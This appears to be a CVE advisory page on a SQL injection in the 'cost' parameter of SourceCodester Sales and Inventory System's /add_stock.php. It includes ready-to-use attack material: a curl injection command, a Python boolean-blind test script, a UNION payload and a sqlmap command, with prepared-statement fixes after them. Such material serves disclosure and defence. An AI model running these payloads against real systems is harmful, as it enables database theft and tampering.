SourceCodester, SQL Injection, CVE-2026-3754 (Medium)

Listen to this Post

A vulnerability classified as CVE-2026-3754 exists in the SourceCodester Sales and Inventory System version 1.0, specifically within the `/add_stock.php` file. The issue stems from a failure to properly sanitize user-supplied input before using it in a SQL query. An attacker can manipulate the `cost` parameter, which is passed to the backend database. By injecting malicious SQL syntax into this parameter, an attacker can alter the intended database query. This could allow the attacker to bypass authentication, extract sensitive data such as usernames and passwords, or modify database content. The attack requires low privileges and no user interaction, and it can be carried out remotely over the network. A proof-of-concept exploit has been made publicly available, increasing the risk of active exploitation. The vulnerability is classified under CWE-89 for SQL Injection. The CVSS 4.0 base score is 5.3, which is considered a Medium severity due to the low impact on confidentiality, integrity, and availability.

dailycve form:

Platform: SourceCodester
Version: 1.0
Vulnerability: SQL Injection
Severity: Medium
date: March 8, 2026

Prediction: April 2026

What Undercode Say:

Analytics

The vulnerability in `/add_stock.php` is a classic example of unvalidated input. Below are commands and concepts related to identifying and understanding this flaw.

Simulated Request:

A normal POST request to add stock might look like this:

`POST /add_stock.php HTTP/1.1`

`Host: target.com`

`Content-Type: application/x-www-form-urlencoded`

`Content-Length: 45`

`product_id=5&quantity=10&cost=15.50`

Bash Command to test for SQLi (using curl):

This command injects a single quote to break the query and a condition that is always true (' OR '1'='1).

curl -X POST http://target.com/add_stock.php \
-d "product_id=5&quantity=10&cost=15.50' OR '1'='1"

Python Script for Boolean-Based Blind SQLi:

This script checks if the page responds differently to a true condition vs. a false condition.

import requests
url = "http://target.com/add_stock.php"
True condition: 1=1
payload_true = {"product_id": "5", "quantity": "10", "cost": "15.50' AND '1'='1"}
False condition: 1=2
payload_false = {"product_id": "5", "quantity": "10", "cost": "15.50' AND '1'='2"}
response_true = requests.post(url, data=payload_true)
response_false = requests.post(url, data=payload_false)
if response_true.text != response_false.text:
print("[+] Vulnerable to Boolean-Based Blind SQL Injection")
else:
print("[-] Not vulnerable or parameters are sanitized")

How Exploit:

An attacker would use a tool like `sqlmap` or craft a manual payload to exploit the `cost` parameter.

Manual Payload Example:

Using a UNION attack to extract the database version:
`cost=15.50′ UNION ALL SELECT null, null, version(), null– -`

sqlmap Command:

Automated exploitation with `sqlmap` is straightforward.

sqlmap -u "http://target.com/add_stock.php" --data="product_id=5&quantity=10&cost=15.50" -p cost --dbs

Protection from this CVE:

Input Validation: Sanitize the `cost` parameter to ensure it accepts only numeric values and valid decimal formats.
Parameterized Queries (Prepared Statements): Use PDO or MySQLi with bound parameters in PHP. For example:

$stmt = $pdo->prepare("INSERT INTO stock (cost) VALUES (:cost)");
$stmt->bindParam(':cost', $cost);
$stmt->execute();

Web Application Firewall (WAF): Deploy rules to block requests containing SQL syntax in the `cost` parameter.
Principle of Least Privilege: Ensure the database user connected to the application has limited permissions (e.g., no `DROP` or `CREATE` privileges).

Impact

Successful exploitation allows an attacker to:

Data Breach: Read sensitive data from the database, including user credentials, customer details, and sales records.

Data Tampering: Modify inventory costs or stock levels.

Authentication Bypass: Log in as an administrative user without a valid password.
Potential Host Compromise: In severe cases, if the database server has file write permissions, an attacker might be able to write malicious files to the server, leading to remote code execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top